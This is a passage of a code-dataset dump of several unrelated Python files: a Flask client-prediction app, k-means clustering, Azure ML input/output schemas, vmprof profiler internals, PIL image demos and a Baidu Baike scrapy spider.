'basic.4y'\n elif education == 'basic.6y':\n strEducation = 'Basic.6y'\n dataEducation = 'basic.6y'\n elif education == 'basic.9y':\n strEducation = 'Basic.9y'\n dataEducation = 'basic.9y'\n elif education == 'high.school':\n strEducation = 'High School'\n dataEducation = 'high.school'\n elif education == 'professional.course':\n strEducation = 'Professional Course'\n dataEducation = 'professional.course'\n elif education == 'university.degree':\n strEducation = 'University Degree'\n dataEducation = 'university.degree'\n \n\n\n\n feature = pd.DataFrame({\n 'age' : [age],\n 'job' : [dataJob],\n 'marital' : [dataMarital],\n 'education' : [dataEducation],\n 'default' : [dataDefault],\n 'month' : [dataMonth],\n 'campaign' : [campaign],\n 'pdays' : [dataPdays],\n 'poutcome' : [dataPoutcome],\n 'emp.var.rate' : [var],\n 'cons.price.idx' : [cpi],\n 'cons.conf.idx' : [cci],\n 'euribor3m' : [euribor],\n 'nr.employed' : [employee]\n })\n\n proba = loadModel.predict_proba(feature)[:,1]\n print(proba)\n\n if proba < 0.33:\n rslt = 'Non-Potential Client'\n else:\n rslt = 'Potential Client'\n\n return render_template('result.html', cpi = cpi, cci = cci, var = var, euribor = euribor, age = age, \n job = strJob, marital = strMarital, month = strMonth, default = strDefault, campaign = campaign, pdays = strPdays,\n poutcome = strPoutcome, education = strEducation, employee = employee, result = rslt)\n\n\n\n\nif __name__ == '__main__':\n loadModel = pickle.load(open('randomforest.sav', 'rb'))\n app.run(debug=True, port = 8050)\n","sub_path":"dashboard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"553623670","text":"# monessako osajonossa vierekkäiset merkit peräkkäin aakkosissa?\n\n# O(n^2)\ndef calc(s):\n n = len(s)\n count = 0\n for i in range(n):\n for j in range(i,n):\n if i != j and abs(ord(s[j-1])-ord(s[j])) != 1:\n break\n print(s[i:j+1])\n count += 1\n return count\n\n# O(n)\ndef calc2(s):\n n = len(s)\n count = 0\n length = 0\n for i in range(n):\n if i != 0 and abs(ord(s[i-1])-ord(s[i])) == 1:\n length += 1\n else:\n length = 1\n count += length\n print('kohtaan', i, 'päättyy', length, 'osajonoa')\n # aabaca\n # ^ 3 osajonoa päättyy tähän kohtaan\n # aabaca\n # ^ 1 osajonoa päättyy tähän kohtaan\n return count\n\n\n#print(calc('aabaca'))\nprint(calc2('aabaca'))\n\ntest_string = \"ab\"*50000\n#print(calc(test_string))\n#print(calc2(test_string))\n","sub_path":"2_Tehokkuus/teoria/substrings.py","file_name":"substrings.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"301996826","text":" # coding=utf-8\r\n\r\nfrom numpy import *\r\nimport csv\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.font_manager import FontProperties\r\n\r\n# 加载数据\r\ndef loadDataSet(fileName): # 解析文件,按tab分割字段,得到一个浮点数字类型的矩阵\r\n dataMat = [] # 文件的最后一个字段是类别标签\r\n with open(fileName, 'r', encoding='utf-8') as f:\r\n readerf = csv.reader(f)\r\n data_line = list(readerf)\r\n for data in data_line[1:]:\r\n dataMat.append(list([float(data[10]), float(data[15])]))\r\n return dataMat\r\n\r\n # 计算欧几里得距离\r\ndef distEclud(vecA, vecB):\r\n return sqrt(sum(power(vecA - vecB, 2))) # 求两个向量之间的距离\r\n\r\n # 构建聚簇中心,取k个随机质心\r\ndef randCent(dataSet, k):\r\n n = shape(dataSet)[1]\r\n centroids = mat(zeros((k,n))) # 每个质心有n个坐标值,总共要k个质心\r\n for j in range(n):\r\n minJ = min(dataSet[:,j])\r\n maxJ = max(dataSet[:,j])\r\n rangeJ = float(maxJ - minJ)\r\n centroids[:,j] = minJ + rangeJ * random.rand(k, 1)\r\n return centroids\r\n\r\n # k-means 聚类算法\r\ndef kMeans(dataSet, k, distMeans =distEclud, createCent = randCent):\r\n m = shape(dataSet)[0]\r\n clusterAssment = mat(zeros((m,2))) # 用于存放该样本属于哪类及质心距离\r\n # clusterAssment第一列存放该数据所属的中心点,第二列是该数据到中心点的距离\r\n centroids = createCent(dataSet, k)\r\n clusterChanged = True # 用来判断聚类是否已经收敛\r\n while clusterChanged:\r\n clusterChanged = False;\r\n for i in range(m): # 把每一个数据点划分到离它最近的中心点\r\n minDist = inf; minIndex = -1;\r\n for j in range(k):\r\n distJI = distMeans(centroids[j,:], dataSet[i,:])\r\n if distJI < minDist:\r\n minDist = distJI; minIndex = j # 如果第i个数据点到第j个中心点更近,则将i归属为j\r\n if clusterAssment[i,0] != minIndex: clusterChanged = True; # 如果分配发生变化,则需要继续迭代\r\n clusterAssment[i,:] = minIndex,minDist**2 # 并��第i个数据点的分配情况存入字典\r\n print (centroids)\r\n for cent in range(k): # 重新计算中心点\r\n ptsInClust = dataSet[nonzero(clusterAssment[:,0].A == cent)[0]] # 去第一列等于cent的所有列\r\n centroids[cent,:] = mean(ptsInClust, axis = 0) # 算出这些数据的中心点\r\n return centroids, clusterAssment\r\n\r\n\r\n# 取数据的前两维特征作为该条数据的x , y 坐标,\r\ndef getXY(dataSet):\r\n import numpy as np\r\n m = shape(dataSet)[0] # 数据集的行\r\n X = []\r\n Y = []\r\n for i in range(m):\r\n X.append(dataSet[i,0])\r\n Y.append(dataSet[i,1])\r\n return np.array(X), np.array(Y)\r\n\r\n# 数据可视化\r\ndef showCluster(dataSet, k, clusterAssment, centroids):\r\n fig = plt.figure()\r\n font = FontProperties(fname=r\"simhei.ttf\", size=14)\r\n plt.title(\"驾驶倾向性聚类\", fontproperties=font)\r\n ax = fig.add_subplot(111)\r\n data = []\r\n\r\n for cent in range(k): # 提取出每个簇的数据\r\n ptsInClust = dataSet[nonzero(clusterAssment[:, 0].A == cent)[0]] # 获得属于cent簇的数据\r\n print(k,ptsInClust,size(ptsInClust))\r\n data.append(ptsInClust)\r\n\r\n for cent, c, marker in zip(range(k), ['r', 'g', 'b', 'y'], ['^', 'o', '*', 's']): # 画出数据点散点图\r\n X, Y = getXY(data[cent])\r\n ax.scatter(X, Y, s=80, c=c, marker=marker)\r\n\r\n centroidsX, centroidsY = getXY(centroids)\r\n # ax.scatter(centroidsX, centroidsY, s=1000, c='black', marker='+', alpha=1) # 画出质心点\r\n ax.set_xlabel('速度稳定性',fontproperties=font)\r\n ax.set_ylabel('平均速度', fontproperties=font)\r\n plt.savefig(r'kmeans.jpg')\r\n plt.show()\r\n\r\nif __name__=='__main__':\r\n # 用测试数据及测试kmeans算法\r\n datMat = mat(loadDataSet(r'All_in_one.csv'))\r\n # for windows\r\n # datMat = mat(loadDataSet(r'D:\\BD\\testdata\\All_in_one.csv'))\r\n myCentroids,clustAssing = kMeans(datMat,3)\r\n print (myCentroids)\r\n print (clustAssing)\r\n showCluster(datMat, 3, clustAssing, myCentroids)","sub_path":"k_means/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"258255318","text":"import time\nimport numpy\nimport pylab\n\ndef getPrimes(limit):\n candidates = []\n for i in range(2,limit+1):\n candidates.append(i)\n for i in range(2,limit+1):\n if i in candidates:\n for j in range(i+i,limit+1,i):\n if j in candidates:\n candidates.remove(j)\n return candidates\n\ndef main():\n start = time.time()\n mainstart = start\n primes = getPrimes(100)\n result = []\n y = []\n limit = 1000\n x = 1\n while x < limit:\n if time.time() - start > 1:\n done = float(x) / float(limit)\n print(done, \"%,\", (((time.time() - mainstart) / x) * limit) / (60))\n start = time.time()\n i = 0\n for prime in primes:\n if i >= 4:\n result.append(x)\n break\n if x % prime == 0:\n i += 1\n x += 1\n print(result, len(result))\n\nmain()\n","sub_path":"old/python/268.py","file_name":"268.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"127167697","text":"# ---------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# ---------------------------------------------------------\n\n# pylint: disable=unused-argument,no-self-use\n\nimport logging\n\nfrom marshmallow import ValidationError, fields, post_load, pre_dump\n\nfrom azure.ai.ml._schema.core.fields import ArmVersionedStr, StringTransformedEnum, UnionField\nfrom azure.ai.ml._schema.core.schema import PatchedSchemaMeta, PathAwareSchema\nfrom azure.ai.ml.constants._common import LOCAL_PATH, AssetTypes, AzureMLResourceType, InputOutputModes\n\nmodule_logger = logging.getLogger(__name__)\n\n\nclass InputSchema(metaclass=PatchedSchemaMeta):\n @post_load\n def make(self, data, **kwargs):\n from azure.ai.ml.entities._inputs_outputs import Input\n\n return Input(**data)\n\n @pre_dump\n def check_dict(self, data, **kwargs):\n from azure.ai.ml.entities._inputs_outputs import Input\n\n if isinstance(data, Input):\n return data\n raise ValidationError(\"InputSchema needs type Input to dump\")\n\n\ndef generate_path_property(azureml_type):\n return UnionField(\n [\n ArmVersionedStr(azureml_type=azureml_type),\n ArmVersionedStr(azureml_type=LOCAL_PATH, pattern=\"^file:.*\"),\n fields.Str(metadata={\"pattern\": \"^(http(s)?):.*\"}),\n fields.Str(metadata={\"pattern\": \"^(wasb(s)?):.*\"}),\n ArmVersionedStr(azureml_type=LOCAL_PATH, pattern=\"^(?!(azureml|http(s)?|wasb(s)?|file):).*\"),\n ],\n is_strict=True,\n )\n\n\nclass ModelInputSchema(InputSchema):\n mode = StringTransformedEnum(\n allowed_values=[\n InputOutputModes.DOWNLOAD,\n InputOutputModes.RO_MOUNT,\n InputOutputModes.DIRECT,\n ],\n required=False,\n )\n type = StringTransformedEnum(\n allowed_values=[\n AssetTypes.CUSTOM_MODEL,\n AssetTypes.MLFLOW_MODEL,\n AssetTypes.TRITON_MODEL,\n ]\n )\n path = generate_path_property(azureml_type=AzureMLResourceType.MODEL)\n datastore = fields.Str(metadata={\"description\": \"Name of the datastore to upload local paths to.\"}, required=False)\n\n\nclass DataInputSchema(InputSchema):\n mode = StringTransformedEnum(\n allowed_values=[\n InputOutputModes.DOWNLOAD,\n InputOutputModes.RO_MOUNT,\n InputOutputModes.DIRECT,\n ],\n required=False,\n )\n type = StringTransformedEnum(\n allowed_values=[\n AssetTypes.URI_FILE,\n AssetTypes.URI_FOLDER,\n ]\n )\n path = generate_path_property(azureml_type=AzureMLResourceType.DATA)\n datastore = fields.Str(metadata={\"description\": \"Name of the datastore to upload local paths to.\"}, required=False)\n\n\nclass MLTableInputSchema(InputSchema):\n mode = StringTransformedEnum(\n allowed_values=[\n InputOutputModes.DOWNLOAD,\n InputOutputModes.RO_MOUNT,\n InputOutputModes.EVAL_MOUNT,\n InputOutputModes.EVAL_DOWNLOAD,\n InputOutputModes.DIRECT,\n ],\n required=False,\n )\n type = StringTransformedEnum(allowed_values=[AssetTypes.MLTABLE])\n path = generate_path_property(azureml_type=AzureMLResourceType.DATA)\n datastore = fields.Str(metadata={\"description\": \"Name of the datastore to upload to.\"}, required=False)\n\n\nclass InputLiteralValueSchema(metaclass=PatchedSchemaMeta):\n value = UnionField([fields.Str(), fields.Bool(), fields.Int(), fields.Float()])\n\n @post_load\n def make(self, data, **kwargs):\n return data[\"value\"]\n\n @pre_dump\n def check_dict(self, data, **kwargs):\n if hasattr(data, \"value\"):\n return data\n raise ValidationError(\"InputLiteralValue must have a field value\")\n\n\nclass OutputSchema(PathAwareSchema):\n mode = StringTransformedEnum(\n allowed_values=[\n InputOutputModes.MOUNT,\n InputOutputModes.UPLOAD,\n InputOutputModes.RW_MOUNT,\n InputOutputModes.DIRECT,\n ],\n required=False,\n )\n type = StringTransformedEnum(\n allowed_values=[\n AssetTypes.URI_FILE,\n AssetTypes.URI_FOLDER,\n AssetTypes.CUSTOM_MODEL,\n AssetTypes.MLFLOW_MODEL,\n AssetTypes.MLTABLE,\n AssetTypes.TRITON_MODEL,\n ]\n )\n path = fields.Str()\n\n @post_load\n def make(self, data, **kwargs):\n from azure.ai.ml.entities._inputs_outputs import Output\n\n return Output(**data)\n\n @pre_dump\n def check_dict(self, data, **kwargs):\n from azure.ai.ml.entities._inputs_outputs import Output\n\n if isinstance(data, Output):\n return data\n # Assists with union schema\n raise ValidationError(\"OutputSchema needs type Output to dump\")\n","sub_path":"sdk/ml/azure-ai-ml/azure/ai/ml/_schema/job/input_output_entry.py","file_name":"input_output_entry.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"381627532","text":"n = int(input())\r\nmin = 9\r\nmax = 0\r\nwhile n!=0:\r\n if n%10>max:\r\n max = n%10\r\n if n%10 0:\n line = file_path.readline()\n distance = re.split('->|, |:|',line.strip('\\n').replace(\" \", \"\"))\n # Adding vertices\n if distance[0] not in vertices:\n vertices.append(distance[0])\n g.set_vertex(distance[0])\n if distance[1] not in vertices:\n vertices.append(distance[1])\n g.set_vertex(distance[1])\n\n g.set_edge(distance[0] ,distance[1], distance[2])\n vertices_number -=1\n # Reading start and destination point\n line = file_path.readline()\n route = re.split('->',line.strip('\\n').replace('route', ' ').replace(\" \", \"\"))\n\n if route[0] and route[1] in vertices:\n g.set_start(route[0])\n g.set_finish(route[1])\n line = file_path.readline()\n nearby = re.split(',',line.strip('\\n').replace('nearby', ' ').replace(\" \", \"\")) # Reading time to reach closest destiation points for start vertex\n g.set_nearby(nearby[0], nearby[1])\n else:\n g.set_error(\"Not possible to find a route\")\n\n return g\n","sub_path":"graph_tools/build_graph.py","file_name":"build_graph.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"533346159","text":"\n\nfrom xai.brain.wordbase.nouns._moat import _MOAT\n\n#calss header\nclass _MOATS(_MOAT, ):\n\tdef __init__(self,): \n\t\t_MOAT.__init__(self)\n\t\tself.name = \"MOATS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"moat\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_moats.py","file_name":"_moats.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"221842443","text":"import io\nimport os\nimport sys\nimport subprocess\nimport struct\ntry:\n from shutil import which\nexcept ImportError:\n from backports.shutil_which import which\n\nfrom . import cli\n\nimport _vmprof\n\nfrom vmprof.reader import read_prof, MARKER_NATIVE_SYMBOLS\nfrom vmprof.stats import Stats\nfrom vmprof.profiler import Profiler, read_profile\n\n\nPY3 = sys.version_info[0] >= 3\nIS_PYPY = '__pypy__' in sys.builtin_module_names\n\n# it's not a good idea to use a \"round\" default sampling period, else we risk\n# to oversample periodic tasks which happens to run at e.g. 100Hz or 1000Hz:\n# http://www.solarisinternals.com/wiki/index.php/DTrace_Topics_Hints_Tips#profile-1001.2C_profile-997.3F\n#\n# To avoid the problem, we use a period which is \"almost\" but not exactly\n# 1000Hz\nDEFAULT_PERIOD = 0.00099\n\ndef disable():\n try:\n _vmprof.disable()\n _gzip_finish()\n except IOError as e:\n raise Exception(\"Error while writing profile: \" + str(e))\n\ndef _is_native_enabled(native):\n if os.name == \"nt\":\n if native:\n raise ValueError(\"native profiling is only supported on Linux & Mac OS X\")\n native = False\n else:\n # TODO native should be enabled by default?\n if native is None:\n native = True\n return native\n\nif IS_PYPY:\n def enable(fileno, period=DEFAULT_PERIOD, memory=False, lines=False, native=None, warn=True):\n pypy_version_info = sys.pypy_version_info[:3]\n if not isinstance(period, float):\n raise ValueError(\"You need to pass a float as an argument\")\n if warn and pypy_version_info < (4, 1, 0):\n raise Exception(\"PyPy <4.1 have various kinds of bugs, pass warn=False if you know what you're doing\")\n if warn and memory:\n print(\"Memory profiling is currently unsupported for PyPy. Running without memory statistics.\")\n if warn and lines:\n print('Line profiling is currently unsupported for PyPy. Running without lines statistics.\\n')\n # TODO fixes currently released pypy's\n native = _is_native_enabled(native)\n gz_fileno = _gzip_start(fileno)\n if pypy_version_info >= (5, 8, 0):\n _vmprof.enable(gz_fileno, period, memory, lines, native)\n else:\n _vmprof.enable(gz_fileno, period) # , memory, lines, native)\nelse:\n # CPYTHON\n def enable(fileno, period=DEFAULT_PERIOD, memory=False, lines=False, native=None):\n if not isinstance(period, float):\n raise ValueError(\"You need to pass a float as an argument\")\n gz_fileno = _gzip_start(fileno)\n native = _is_native_enabled(native)\n _vmprof.enable(gz_fileno, period, memory, lines, native)\n\n def dump_native_symbols(fileno):\n # native symbols cannot be resolved in the signal handler.\n # it would take far too long. Thus this method should be called\n # just after the sampling finished and before the file descriptor\n # is closed.\n\n # called from C with the fileno that has been used for this profile\n # duplicates are avoided if this function is only called once for a profile\n fileobj = io.open(fileno, mode='rb', closefd=False)\n fileobj.seek(0)\n _, profiles, _, _, _, _, _ = read_prof(fileobj)\n\n duplicates = set()\n fileobj = io.open(fileno, mode='ab', closefd=False)\n\n for profile in profiles:\n addrs = profile[0]\n for addr in addrs:\n if addr in duplicates:\n continue\n duplicates.add(addr)\n if addr & 0x1 and addr > 1:\n name, lineno, srcfile = _vmprof.resolve_addr(addr)\n if name == \"\" and srcfile == '-':\n name = \"\" % addr\n\n str = \"n:%s:%d:%s\" % (name, lineno, srcfile)\n if PY3:\n str = str.encode()\n out = [MARKER_NATIVE_SYMBOLS, struct.pack(\"l\", addr),\n struct.pack(\"l\", len(str)),\n str]\n fileobj.write(b''.join(out))\n\n def sample_stack_now(skip=0):\n \"\"\" Helper utility mostly for tests, this is considered\n private API.\n\n It will return a list of stack frames the python program currently\n walked.\n \"\"\"\n stackframes = _vmprof.sample_stack_now(skip)\n assert isinstance(stackframes, list)\n return stackframes\n\n def resolve_addr(addr):\n \"\"\" Private API, returns the symbol name of the given address.\n Only considers linking symbols found by dladdr.\n \"\"\"\n return _vmprof.resolve_addr(addr)\n\n\n_gzip_proc = None\n\ndef _gzip_start(fileno):\n \"\"\"Spawn a gzip subprocess that writes compressed profile data to `fileno`.\n\n Return the subprocess' input fileno.\n \"\"\"\n # XXX During the sprint in munich we found several issues\n # on bigger applications running vmprof. For instance:\n # coala or some custom medium sized scripts.\n return fileno\n #\n # Prefer system gzip and fall back to Python's gzip module\n if which(\"gzip\"):\n gzip_cmd = [\"gzip\", \"-\", \"-4\"]\n else:\n gzip_cmd = [\"python\", \"-u\", \"-m\", \"gzip\"]\n global _gzip_proc\n _gzip_proc = subprocess.Popen(gzip_cmd, stdin=subprocess.PIPE,\n stdout=fileno, bufsize=-1,\n close_fds=(sys.platform != \"win32\"))\n if _gzip_proc.returncode is not None:\n # oh, the gzip process has terminated already?\n _gzip_proc = None\n return fileno # proceed without compressing the object\n return _gzip_proc.stdin.fileno()\n\ndef _gzip_finish():\n global _gzip_proc\n if _gzip_proc is not None:\n _gzip_proc.stdin.close()\n returncode = _gzip_proc.wait()\n assert returncode == 0, \\\n \"return code was non zero: %d\" % returncode\n _gzip_proc = None\n","sub_path":"vmprof/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"513752520","text":"import csv\n\ndef calculate_avg_epoch_losses(epoch_losses_G, epoch_losses_D, iter_count):\n avg_epoch_loss_G = sum(epoch_losses_G) / iter_count\n avg_epoch_loss_D = sum(epoch_losses_D) / iter_count\n\n return avg_epoch_loss_G, avg_epoch_loss_D\n\ndef save_training_losses(model_num, losses_G, losses_D): # Verimsiz\n rows = zip(losses_G, losses_D)\n \n with open(\"./checkpoints_\"+str(model_num)+\"/\"+\"losses.csv\", 'w') as l:\n writer = csv.writer(l)\n \n for row in rows:\n writer.writerow(row)\n\ndef get_training_losses(model_num):\n with open(\"./checkpoints_\" + str(model_num) + \"/losses.csv\", 'r') as csv_file:\n lines = csv_file.readlines()\n\n losses_G = []\n losses_D = []\n\n for line in lines:\n data = line.split(',')\n losses_G.append(data[0])\n losses_D.append(data[1])\n\n return losses_G, losses_D","sub_path":"my_pix2pix/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"154321857","text":"FRACTIONS = {\n 'half': 1/2,\n 'havles': 1/2,\n 'halve': 1/2,\n 'quarter': 1/4,\n 'eighth': 1/8,\n 'qtr.': 1/4,\n 'qtr': 1/4,\n}\n\n\nclass Text2Fraction:\n\n @staticmethod\n def text_to_fraction(text):\n if text in FRACTIONS:\n return FRACTIONS[text]\n return 0","sub_path":"recipe_parser/text_to_fraction.py","file_name":"text_to_fraction.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"582596052","text":"from PIL import Image\n\n# PIL is used because of compatiblity with Python 2.7\n\nmy_image = Image.open(\"demo1.jpg\")\n\n# Simple tasks : getting details about the pic \n\nprint (\"Size of the image : \", my_image.size)\nprint(\"Format of the image : \", my_image.format)\nprint(\"Mode of the image : \", my_image.mode)\n\n# Cropping the image \n# we need to fix the area to crop the image to that area\n# The agrguments consists of (left, upper, right, lower)\n\narea = (500, 500, 1500, 1500)\n\n# The box is of size (1500 - 500) X (1500 - 500) = 1000 X 1000\n# The box has length and width of 1000px\n# the cropped Image has the size of 500 X 500\n# That is we started 500 px from left and upper\n\ncropped_image = my_image.crop(area)\n# cropped_image.show()\n\nprint(\"Cropped Image : \")\nprint (\"Size is : \", cropped_image.size, \"Mode is : \", cropped_image.mode)\n\n\n# Merging two different images \n\nimage_1 = Image.open(\"demo2.jpg\")\nimage_2 = Image.open(\"demo3.png\")\n\narea_2 = (0, 0, 1920, 1080)\n\n# image_1.crop(area_2).show()\n\n# Pasting image_2 on image_1 \n\nimage_1.paste(image_2, area_2)\n#image_1.show()\n\n# Every image is made up of 3 colors Red green and Blue \n# Lets split a image in 3 different channels\n\nimage_3 = Image.open(\"demo1.jpg\")\n\n(red, green, blue) = image_3.split()\n\n# the split function returns 3 diffferent tuples \n\n# red.show()\n# green.show()\n# blue.show()\n\n\n# We can also do the opposite of it...merge 3 diffferent R, G, B channels \n# We have already extracted the ddifferent channels in a tuple\n\nimg_mode = image_3.mode\n\nnew_image = Image.merge(img_mode, (red, green, blue))\nnew_image.show()\n\n# We can make different filters just by changing the tuple order\n\nnew_image_2 = Image.merge(img_mode, (green, red, blue))\nnew_image_2.show()\n\n# We can take channels from different images and can merge them in a single image\n# Both the images should be of same size hence we need to crop both the pics \n\nbox = (800, 200, 1800, 1000)\n\nimage_3 = Image.open(\"demo1.jpg\").crop(box)\n(red, green, blue) = image_3.split()\n\nimage_4 = Image.open(\"demo2.jpg\").crop(box)\n(red_1, green_1, blue_1) = image_4.split()\n\n# now we have 6 different channels ans we can merge them together in a new image\n\nnew_image_3 = Image.merge(img_mode, (red_1, green, blue_1))\nnew_image_3.show()\n\n","sub_path":"imgPillow/fun_with_pillow.py","file_name":"fun_with_pillow.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"554024170","text":"from Interfaces import Set\nfrom DLList import DLList\nimport numpy as np\n\n\nclass ChainedHashTable(Set):\n class Node():\n def __init__(self, key, value):\n self.key = key\n self.value = value\n\n def __init__(self, dtype=DLList):\n self.dtype = dtype\n self.d = 1\n self.t = self.alloc_table(2 ** self.d)\n self.z = 193759204821\n self.w = 31\n self.n = 0\n\n def alloc_table(self, n: int):\n t = np.zeros(n, dtype=np.object)\n for i in range(n):\n t[i] = self.dtype()\n return t\n\n def hash(self, key: int) -> int:\n return self.z * hash(key) % (2 ** self.w) >> (self.w - self.d)\n\n def size(self) -> int:\n return self.n\n\n def find(self, key: object) -> object:\n for i in range(self.t[self.hash(key)].size()):\n if self.t[self.hash(key)].get(i).key == key:\n return self.t[self.hash(key)].get(i).value\n return None\n\n def add(self, key: object, value: object):\n if self.find(key) != None:\n return None\n if self.n == len(self.t): # added self.n+1\n self.resize()\n self.t[self.hash(key)].append(self.Node(key, value))\n self.n += 1\n return True\n\n def remove(self, key: int) -> object:\n for i in range(self.t[self.hash(key)].size()):\n if self.t[self.hash(key)].get(i).key == key:\n self.t[self.hash(key)].remove(i)\n self.n -= 1\n if len(self.t) >= 3 * self.n:\n self.resize()\n return True\n return None\n\n def resize(self):\n if self.n == len(self.t):\n self.d += 1\n else:\n self.d -= 1\n a = self.alloc_table(2 ** self.d)\n for j in range(len(self.t)):\n for i in range(self.t[j].size()):\n a[self.hash(self.t[j].get(i).key)].append(self.t[j].get(i))\n self.t = a\n\n def __str__(self):\n s = \"[\"\n for i in range(len(self.t)):\n for j in range(len(self.t[i])):\n k = self.t[i][j]\n s += str(k.key)\n s += \":\"\n s += str(k.value)\n s += \";\"\n return s + \"]\"\n\n# x = ChainedHashTable()\n# print(x.remove(1))\n# print(x.find(2))\n# x.add(1, \"first\")\n# x.add(2, \"second\")\n# x.add(3, \"fourth\")\n# print(x)\n# print(x.size())\n# print(x.find(3))\n# print(x.remove(3))\n# print(x)\n# print(x.size())\n# print(x.find(3))\n# x.add(3, \"third\")\n# x.add(4, \"fourth\")\n# x.add(5, \"fifth\")\n# print(x)\n# print(x.size())\n# print(x.find(3))\n\n\n","sub_path":"ChainedHashTable.py","file_name":"ChainedHashTable.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"477392012","text":"import os\nfrom io import TextIOWrapper\n\nfrom py_mini_racer import py_mini_racer\n\nclass ZmeiReactServer(object):\n def __init__(self):\n super().__init__()\n\n self.loaded_files = []\n self.loaded_files_mtime = {}\n\n self.jsi = None\n\n self.checksum = None\n\n def reload_interpreter(self):\n self.jsi = py_mini_racer.MiniRacer()\n\n code = \"\"\"\n var global = this;\n var module = {exports: {}};\n var setTimeout = function(){};\n var clearTimeout = function(){};var console = {\n error: function() {},\n log: function() {},\n warn: function() {}\n };\n \"\"\"\n\n self.jsi.eval(code)\n\n for filename in self.loaded_files:\n self.loaded_files_mtime[filename] = os.path.getmtime(filename)\n self.eval_file(filename)\n\n def autreload(self):\n if len(self.loaded_files_mtime) == 0:\n return\n\n for filename in self.loaded_files:\n if self.loaded_files_mtime[filename] != os.path.getmtime(filename):\n print('Reloading ZmeiReactServer')\n self.reload_interpreter()\n break\n\n def evaljs(self, code):\n if not self.jsi:\n self.reload_interpreter()\n\n return self.jsi.eval(code)\n\n # except JSRuntimeError as e:\n # message = str(e)\n #\n # message = '\\n' + colored('Error:', 'white', 'on_red') + ' ' + message\n #\n # print(message)\n # m = re.search('\\(line\\s+([0-9]+)\\)', message)\n # if m:\n # print('-' * 100)\n # print('Source code:')\n # print('-' * 100)\n # row = int(m.group(1)) - 1\n # source = code.splitlines()\n #\n # line = colored(source[row], 'white', 'on_red')\n # print('\\n'.join([f'{x+1}:\\t{source[x]}' for x in range(max(0, row - 10), row)]))\n # print(f'{row+1}:\\t{line}')\n # print('\\n'.join([f'{x+1}:\\t{source[x]}' for x in range(row + 1, min(row + 10, len(source) - 1))]))\n # print('-' * 100)\n\n def load(self, filename):\n self.loaded_files.append(filename)\n\n def eval_file(self, filename):\n with open(filename) as f:\n self.evaljs(f.read())\n","sub_path":"zmei/react.py","file_name":"react.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"321444188","text":"# coding:utf-8\n\nimport sys\nimport os\nimport json\nimport scrapy\nfrom bs4 import BeautifulSoup\nfrom ..items import BaikeItem\nfrom scrapy import log\nimport time\nimport common\nfrom urllib.parse import urlparse\nimport config\n\n# split -l 2482 BLM.txt -d -a 4 BLM_\n\nclass MdxSpider(scrapy.Spider):\n name = 'mdx'\n #allowed_domains = ['baike.baidu.com']\n\n def start_requests(self):\n url_file = open('/home/hyc/baike_spider/url.txt', mode='r+', encoding='UTF-8')\n page = 0\n for url in url_file:\n print('请求url:%s' % url)\n yield scrapy.Request(url=url, callback=self.parse, dont_filter=True, meta={'page': page})\n page = page + 1\n # url = 'https://baike.baidu.com/item/%E7%8E%9B%E4%B8%BD%E4%BA%9A%C2%B7%E5%8D%A1%E6%8B%89%E6%96%AF'\n # yield scrapy.Request(url=url, callback=self.parse, dont_filter=True, meta={'page':11})\n\n def parse(self, response):\n # 错误页面\n request_url = 'https://baike.baidu.com/view/%d.html' % response.meta['page']\n if (common.str_encrypt(response.url) == common.str_encrypt('https://baike.baidu.com/error.html')):\n log.msg('请求页面错误,request url:%s, return error html' %request_url, level=log.ERROR)\n return\n\n try:\n content = BeautifulSoup(response.body, \"html.parser\")\n\n # 同义词处理\n lemmaWgt = content.select('div[class=\"lemmaWgt-subLemmaListTitle\"]')\n if (len(lemmaWgt)):\n words = content.select('li[class=\"list-dot list-dot-paddingleft\"]')\n if (len(words)):\n print(words)\n for word in words:\n url = 'https://baike.baidu.com%s' % word.find('a')['href']\n print('同义词处理,返回url:%s, 请求url:%s' % (response.url, url))\n yield scrapy.Request(url=url, callback=self.parse, dont_filter=True, meta={'page': response.meta['page']})\n return\n\n # 其他情况处理\n main_item = response.xpath('//script').re(\"nslog\\(\\)\\.setGlobal\\(\\{([\\d\\D]*?)\\}\\)\")[0]\n main_dict = self.__getMainDict(main_item)\n # for data in main_item.split(','):\n # (key, value) = self.__parseData(data)\n # main_dict[key] = value\n #{'lemmaId': '1719', 'newLemmaId': '16191846', 'subLemmaId': '16136678', 'lemmaTitle': '曹操'}\n\n main_dict['desc'] = content.find(attrs={\"name\": \"description\"})['content']\n\n title_item = 